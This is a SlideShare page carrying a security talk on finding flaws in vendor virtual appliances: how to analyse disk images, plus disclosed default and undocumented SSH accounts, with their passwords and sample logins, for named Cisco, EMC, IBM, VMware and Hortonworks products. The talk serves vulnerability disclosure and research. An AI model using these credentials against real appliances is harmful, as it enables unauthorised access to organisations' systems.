Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfest
 
Visiting the Bear Den
Visiting the Bear DenVisiting the Bear Den
Visiting the Bear Den
 
Level Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege EscalationLevel Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege Escalation
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devices
 
Software Security : From school to reality and back!
Software Security : From school to reality and back!Software Security : From school to reality and back!
Software Security : From school to reality and back!
 
Заполучили права администратора домена? Игра еще не окончена
Заполучили права администратора домена? Игра еще не оконченаЗаполучили права администратора домена? Игра еще не окончена
Заполучили права администратора домена? Игра еще не окончена
 
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could Expect
 
Steelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trashSteelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trash
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
 
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
 
Getting root with benign app store apps
Getting root with benign app store appsGetting root with benign app store apps
Getting root with benign app store apps
 
Steelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with PythonSteelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with Python
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)
 
Hacking - high school intro
Hacking - high school introHacking - high school intro
Hacking - high school intro
 
Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!
 

Viewers also liked

Vagrant + Ansible + Docker
Vagrant + Ansible + DockerVagrant + Ansible + Docker
Vagrant + Ansible + DockerVijay Selvaraj
 
Vagrant, Ansible and Docker - How they fit together for productive flexible d...
Vagrant, Ansible and Docker - How they fit together for productive flexible d...Vagrant, Ansible and Docker - How they fit together for productive flexible d...
Vagrant, Ansible and Docker - How they fit together for productive flexible d...Samuel Lampa
 
DevOps introduction with ansible, vagrant, and docker
DevOps introduction with ansible, vagrant, and dockerDevOps introduction with ansible, vagrant, and docker
DevOps introduction with ansible, vagrant, and dockerMark Stillwell
 
Model-Driven Deployment : The Best Practice Successor to Virtual Appliances
Model-Driven Deployment : The Best Practice Successor to Virtual AppliancesModel-Driven Deployment : The Best Practice Successor to Virtual Appliances
Model-Driven Deployment : The Best Practice Successor to Virtual AppliancesTherese Wells
 
Vagrant and Docker
Vagrant and DockerVagrant and Docker
Vagrant and DockerNascenia IT
 
Batch import of large RDF datasets into Semantic MediaWiki
Batch import of large RDF datasets into Semantic MediaWikiBatch import of large RDF datasets into Semantic MediaWiki
Batch import of large RDF datasets into Semantic MediaWikiSamuel Lampa
 
Vagrant and docker
Vagrant and dockerVagrant and docker
Vagrant and dockerDuckDuckGo
 
DevOps, A brief introduction to Vagrant & Ansible
DevOps, A brief introduction to Vagrant & AnsibleDevOps, A brief introduction to Vagrant & Ansible
DevOps, A brief introduction to Vagrant & AnsibleArnaud LEMAIRE
 
An Introduction to Vagrant and Docker
An Introduction to Vagrant and DockerAn Introduction to Vagrant and Docker
An Introduction to Vagrant and DockerScott Lowe
 
Vagrant + Docker provider [+Puppet]
Vagrant + Docker provider [+Puppet]Vagrant + Docker provider [+Puppet]
Vagrant + Docker provider [+Puppet]Nicolas Poggi
 

Viewers also liked (12)

Vagrant + Ansible + Docker
Vagrant + Ansible + DockerVagrant + Ansible + Docker
Vagrant + Ansible + Docker
 
Vagrant, Ansible and Docker - How they fit together for productive flexible d...
Vagrant, Ansible and Docker - How they fit together for productive flexible d...Vagrant, Ansible and Docker - How they fit together for productive flexible d...
Vagrant, Ansible and Docker - How they fit together for productive flexible d...
 
DevOps introduction with ansible, vagrant, and docker
DevOps introduction with ansible, vagrant, and dockerDevOps introduction with ansible, vagrant, and docker
DevOps introduction with ansible, vagrant, and docker
 
Vmware virtual appliances
Vmware virtual appliancesVmware virtual appliances
Vmware virtual appliances
 
Model-Driven Deployment : The Best Practice Successor to Virtual Appliances
Model-Driven Deployment : The Best Practice Successor to Virtual AppliancesModel-Driven Deployment : The Best Practice Successor to Virtual Appliances
Model-Driven Deployment : The Best Practice Successor to Virtual Appliances
 
Vagrant and Docker
Vagrant and DockerVagrant and Docker
Vagrant and Docker
 
Batch import of large RDF datasets into Semantic MediaWiki
Batch import of large RDF datasets into Semantic MediaWikiBatch import of large RDF datasets into Semantic MediaWiki
Batch import of large RDF datasets into Semantic MediaWiki
 
Vagrant and docker
Vagrant and dockerVagrant and docker
Vagrant and docker
 
DevOps, A brief introduction to Vagrant & Ansible
DevOps, A brief introduction to Vagrant & AnsibleDevOps, A brief introduction to Vagrant & Ansible
DevOps, A brief introduction to Vagrant & Ansible
 
An Introduction to Vagrant and Docker
An Introduction to Vagrant and DockerAn Introduction to Vagrant and Docker
An Introduction to Vagrant and Docker
 
Ansible docker
Ansible dockerAnsible docker
Ansible docker
 
Vagrant + Docker provider [+Puppet]
Vagrant + Docker provider [+Puppet]Vagrant + Docker provider [+Puppet]
Vagrant + Docker provider [+Puppet]
 

Similar to Hacking Virtual Appliances

Threat_Modelling.pdf
Threat_Modelling.pdfThreat_Modelling.pdf
Threat_Modelling.pdfMarlboroAbyad
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016Chris Gates
 
Hard Coding as a design approach
Hard Coding as a design approachHard Coding as a design approach
Hard Coding as a design approachOren Eini
 
Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Yury Chemerkin
 
CIRCUIT 2015 - Monitoring AEM
CIRCUIT 2015 - Monitoring AEMCIRCUIT 2015 - Monitoring AEM
CIRCUIT 2015 - Monitoring AEMICF CIRCUIT
 
It's 10pm, Do You Know Where Your Access Keys Are?
It's 10pm, Do You Know Where Your Access Keys Are?It's 10pm, Do You Know Where Your Access Keys Are?
It's 10pm, Do You Know Where Your Access Keys Are?Ken Johnson
 
Mwlug2014 - IBM Connections Security and Migration
Mwlug2014 - IBM Connections Security and MigrationMwlug2014 - IBM Connections Security and Migration
Mwlug2014 - IBM Connections Security and MigrationVictor Toal
 
Operating system security
Operating system securityOperating system security
Operating system securityRamesh Ogania
 
Microsoft Azure Hybrid Cloud - Getting Started For Techies
Microsoft Azure Hybrid Cloud - Getting Started For TechiesMicrosoft Azure Hybrid Cloud - Getting Started For Techies
Microsoft Azure Hybrid Cloud - Getting Started For TechiesAidan Finn
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysJoff Thyer
 
Integrating and Monitoring System Center Virtual Machine Manager with Operati...
Integrating and Monitoring System Center Virtual Machine Manager with Operati...Integrating and Monitoring System Center Virtual Machine Manager with Operati...
Integrating and Monitoring System Center Virtual Machine Manager with Operati...Ronnie Isherwood
 
Security Testing - Where Automation Fails
Security Testing - Where Automation FailsSecurity Testing - Where Automation Fails
Security Testing - Where Automation FailsChristiaan Ottow
 
A Hitchhiker's Guide to troubleshooting IBM Connections
A Hitchhiker's Guide to troubleshooting IBM ConnectionsA Hitchhiker's Guide to troubleshooting IBM Connections
A Hitchhiker's Guide to troubleshooting IBM ConnectionsICON UK EVENTS Limited
 
A hitchhiker’s guide to troubleshooting ibm connections
A hitchhiker’s guide to troubleshooting ibm connectionsA hitchhiker’s guide to troubleshooting ibm connections
A hitchhiker’s guide to troubleshooting ibm connectionsSharon James
 
SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)Jerome Smith
 
Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17Brandon Arvanaghi
 
Controlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and DataControlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and DataPrecisely
 
Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahOWASP Delhi
 

Similar to Hacking Virtual Appliances (20)

Confidence web
Confidence webConfidence web
Confidence web
 
Threat_Modelling.pdf
Threat_Modelling.pdfThreat_Modelling.pdf
Threat_Modelling.pdf
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
 
Hard Coding as a design approach
Hard Coding as a design approachHard Coding as a design approach
Hard Coding as a design approach
 
Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...
 
CIRCUIT 2015 - Monitoring AEM
CIRCUIT 2015 - Monitoring AEMCIRCUIT 2015 - Monitoring AEM
CIRCUIT 2015 - Monitoring AEM
 
It's 10pm, Do You Know Where Your Access Keys Are?
It's 10pm, Do You Know Where Your Access Keys Are?It's 10pm, Do You Know Where Your Access Keys Are?
It's 10pm, Do You Know Where Your Access Keys Are?
 
Mwlug2014 - IBM Connections Security and Migration
Mwlug2014 - IBM Connections Security and MigrationMwlug2014 - IBM Connections Security and Migration
Mwlug2014 - IBM Connections Security and Migration
 
Operating system security
Operating system securityOperating system security
Operating system security
 
Sami Laiho - Black belt troubleshooting windows 8.1
Sami Laiho - Black belt troubleshooting windows 8.1Sami Laiho - Black belt troubleshooting windows 8.1
Sami Laiho - Black belt troubleshooting windows 8.1
 
Microsoft Azure Hybrid Cloud - Getting Started For Techies
Microsoft Azure Hybrid Cloud - Getting Started For TechiesMicrosoft Azure Hybrid Cloud - Getting Started For Techies
Microsoft Azure Hybrid Cloud - Getting Started For Techies
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
Integrating and Monitoring System Center Virtual Machine Manager with Operati...
Integrating and Monitoring System Center Virtual Machine Manager with Operati...Integrating and Monitoring System Center Virtual Machine Manager with Operati...
Integrating and Monitoring System Center Virtual Machine Manager with Operati...
 
Security Testing - Where Automation Fails
Security Testing - Where Automation FailsSecurity Testing - Where Automation Fails
Security Testing - Where Automation Fails
 
A Hitchhiker's Guide to troubleshooting IBM Connections
A Hitchhiker's Guide to troubleshooting IBM ConnectionsA Hitchhiker's Guide to troubleshooting IBM Connections
A Hitchhiker's Guide to troubleshooting IBM Connections
 
A hitchhiker’s guide to troubleshooting ibm connections
A hitchhiker’s guide to troubleshooting ibm connectionsA hitchhiker’s guide to troubleshooting ibm connections
A hitchhiker’s guide to troubleshooting ibm connections
 
SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)
 
Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17
 
Controlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and DataControlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and Data
 
Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv Shah
 

More from Jeremy Brown

Summer of Fuzz: macOS
Summer of Fuzz: macOSSummer of Fuzz: macOS
Summer of Fuzz: macOSJeremy Brown
 
Attacking Big Data Land
Attacking Big Data LandAttacking Big Data Land
Attacking Big Data LandJeremy Brown
 
Adventures with Podman and Varlink
Adventures with Podman and VarlinkAdventures with Podman and Varlink
Adventures with Podman and VarlinkJeremy Brown
 
ProdSec: A Technical Approach
ProdSec: A Technical ApproachProdSec: A Technical Approach
ProdSec: A Technical ApproachJeremy Brown
 
Microsoft Vulnerability Research - How to be a finder as a vendor
Microsoft Vulnerability Research - How to be a finder as a vendorMicrosoft Vulnerability Research - How to be a finder as a vendor
Microsoft Vulnerability Research - How to be a finder as a vendorJeremy Brown
 

More from Jeremy Brown (7)

Provoking Windows
Provoking WindowsProvoking Windows
Provoking Windows
 
Summer of Fuzz: macOS
Summer of Fuzz: macOSSummer of Fuzz: macOS
Summer of Fuzz: macOS
 
Unsecuring SSH
Unsecuring SSHUnsecuring SSH
Unsecuring SSH
 
Attacking Big Data Land
Attacking Big Data LandAttacking Big Data Land
Attacking Big Data Land
 
Adventures with Podman and Varlink
Adventures with Podman and VarlinkAdventures with Podman and Varlink
Adventures with Podman and Varlink
 
ProdSec: A Technical Approach
ProdSec: A Technical ApproachProdSec: A Technical Approach
ProdSec: A Technical Approach
 
Microsoft Vulnerability Research - How to be a finder as a vendor
Microsoft Vulnerability Research - How to be a finder as a vendorMicrosoft Vulnerability Research - How to be a finder as a vendor
Microsoft Vulnerability Research - How to be a finder as a vendor
 

Recently uploaded

APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024BookNet Canada
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 

Recently uploaded (20)

APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 

Hacking Virtual Appliances

  • 2. Agenda I. Introduction II. Public Examples III. Image Analysis IV. Newer Bugs I. (un)documented Accounts II. Misc Bugs III. Password Litter IV. Bootloader Access V. Conclusion
  • 3. #whoami • Jeremy Brown – Independent researcher / consultant – Formerly of Microsoft • Windows/Phone/Xbox Security • Malware Protection Center – Also, Tenable • Nessus • RE patches
  • 4. What I’m Not Talking About • Web bugs that don’t directly lead to a shell – XSS, CSRF, XSHM, ... – Clickjacking (is this still a thing?) • Decrypting VM images – This is pre-bug hunting stuff
  • 5. What I’m Talking About • Remote Shells – Command injection – Backdoor or “support” accounts • Privilege Escalation – Once we have a shell, let’s escalate to root • Other Interesting Bugs – Format strings, misconfigured services – Passwords littered all over the filesystem
  • 6. What is a Virtual Appliance? • Appliances – Network management, Firewall, Kiosk, SIEM, etc • Virtual Appliance – Hardware – Software • OS with application suite pre-installed
  • 7. What is a Virtual Appliance? • Physical Appliance – “Let’s give them a box with some Ethernet jacks, restrict functionality and lock update availability to a support contract” • Virtual Appliance – “Let’s dump / configure all the device’s software and OS to a VM image and ship it to datacenters”
  • 8. What is a Virtual Appliance? References: https://www.vmware.com/files/pdf/vam/VMware_Virtual_Appliance_Solutions_White_Paper_08Q3.pdf https://vmware-partnerpedia-shared.s3.amazonaws.com/documents/Virtual_Appliance_Whitepaper.pdf http://www.forescout.com/wp-content/media/FS-Virtual_Appliance_Tech_Note.pdf
  • 9. Important Distinction • The bugs found aren’t specific to environment and Administrator, they are vendor-specific – Eg. These are shipped, not created upon provision • One bug rules them all, just like applications – Except VAs aren’t apps, they’re scalable like PCs
  • 10. Popular Vendors • IBM, EMC, HP, Oracle, Symantec, SonicWall, VMware, Cisco • SAP – Thanks a lot for the cloud-only trials!
  • 11. Pros/Cons for Bug Hunting • Pros – Likely share 95% same code as physical device – Common mindset of “customers don’t have root” which leads to shipping a “litter box” • Cons – You can’t really make support phone calls
  • 12. Why go after these appliances? • Prevalence – More vendors offering both options for delivery • Entertainment • Value
  • 13. Entertainment • “Here’s an image of my work PC!” – .ssh/known_hosts – .viminfo, .bash_history
  • 18. Entertainment • WHY WOULD ANYONE SUID ROOT THE ID BINARY!?!?!
  • 19.
  • 20. Value • These are obviously used in the enterprise • Enterprises put a lot of money in security – Money != Results, but let’s not worry about that – If nothing else, we are in compliance • Customers (often more than vendors) want these bugs fixed
  • 21. Why is security so bad? • Many vendors don’t see what the big deal is – “Here’s a computer, go set it up, it’s real easy, change the passwords if you want to, it’s fine” Reference: http://www.adempiere.com/ADempiere_Virtual_Appliance_Install
  • 22.
  • 23. Acquiring VAs • Vendor Websites – “Free Trial” – “Request Evaluation” – “Demo Now” • Some of these are dummy VMs, some are real • Make a purchase • Not available – Unless you’re a partner with support contract :’(
  • 24. Agenda I. Introduction II. Public Examples III. Image Analysis IV. Newer Bugs I. (un)documented Accounts II. Misc Bugs III. Password Litter IV. Bootloader Access V. Conclusion
  • 26. Command Injection • Sophos Web Protection Appliance
  • 27. Command Injection • Sophos is noted for having fixed this 03/2013 – Still works as of early 2015 Reference: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130403- 0_Sophos_Web_Protection_Appliance_Multiple_Vulnerabilities.txt
  • 28. Documented Accounts • Hortonworks Sandbox Reference: http://hortonworks.com/customers/
  • 29. Documented Accounts • $ ssh vagrant@hw-sandbox – vagrant@Hadoop-'s password: [vagrant] • [vagrant@sandbox ~]$ sudo bash • [root@sandbox vagrant]#
  • 31. Agenda I. Introduction II. Public Examples III. Image Analysis IV. Newer Bugs I. (un)documented Accounts II. Misc Bugs III. Password Litter IV. Bootloader Access V. Conclusion
  • 32. Image Analysis • Virtual Appliance distribution – OVA containers provide the disk image and metadata (VMware, VirtualBox) – VAs may also come as just a VHD (Hyper-V)
  • 33. Image Analysis • Dynamic View – Boot up the system and use the local system – “What you see is what you get” • Procedure – Load VM image into hypervisor • Limitations – Trouble if root isn’t default or shell is locked down – Motive to find privilege escalation bugs though 
  • 34. Image Analysis • Static View – Browse filesystem in a tree view – Use regex to look for interesting patterns • Procedure – Convert to raw filesystem (eg. qemu-img) – Browse with an imager / forensic toolkit • Limitations – “First boot” scripts could change initial values
  • 35. Agenda I. Introduction II. Public Examples III. Image Analysis IV. Newer Bugs I. (un)documented Accounts II. Misc Bugs III. Password Litter IV. Bootloader Access V. Conclusion
  • 37. Documented Accounts • Cisco Paging Server v11 – OEM for Singlewire Software
  • 38. Documented Accounts • SSHD, Webmin and the Web Interface – The first two share the same auth system – The last one does not • So what happens when you change the admin password in the web interface?
  • 39. Documented Accounts • This section only applies to the web interface • They never talk about changing sshd/wm credentials • The documentation calls out the default password, but never asks or warns the user to change it!@# Reference: http://www.cisco.com/c/dam/en/us/td/docs/voice_ip_comm/cucm/singlewire/InformaCastBasicPaging.pdf
  • 40. Documented Accounts • admin@cisco-paging's password: [changeMe] – Linux singlewire 3.2.0-4-686-pae #1 SMP Debian 3.2.57-3+deb7u2 i686 – admin@singlewire:~$
  • 41. Documented Accounts • Cisco might chalk this up a documentation bug – But you can go own a bunch of paging servers
  • 42. Undocumented Accounts • EMC PowerPath Reference: http://www.emc.com/products-solutions/trial-software-download/ppve.htm
  • 43. Undocumented Accounts • Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X2]) – password (emcupdate) Image: /via @bl4sty
  • 44. Undocumented Accounts • $ ssh emcupdate@emc-pp – Password: [password] – emcupdate@localhost:~> • https://emc-pp:5480/#update.Config
  • 45. Undocumented Accounts • IBM SmartCloud Monitoring (Trial-only tested) Reference: http://www-03.ibm.com/software/products/en/ibmsmarmoni/
  • 46. Undocumented Accounts • 6 users on the system with bash shells – 2 users aren’t documented
  • 47. Undocumented Accounts • $ ssh db2sdfe1@smartcloud – Password: [smartway] • db2sdfe1@scmtrial:~> id – uid=1003(db2sdfe1) gid=114(db2fsdm1) groups=16(dialout),33(video),114(db2fsdm1)
  • 48. Undocumented Accounts • VMware Horizon Mobile Manager
  • 49. Undocumented Accounts • $ ssh mmp@vmware-hmm – # This is a dummy banner. Replace this with your own banner, appropriate for the VA – mmp@vmware-hmm's password: [mmp] • mmp@localhost:~> id – uid=1001(mmp) gid=100(users) groups=100(users),16(dialout),33(video)
  • 50. Undocumented Accounts • VMware probably isn’t going to fix it as it’s EOL soon • Tested v1.3, so 1.3.1 *may* have fixed this – Couldn’t find a way to update to 1.3.1 – So what if customers can’t update either? – No docs on how to update nor what was fixed Reference: https://my.vmware.com/group/vmware/info?slug=desktop_end_user_computing/vmware_horizon_mobile/1_3
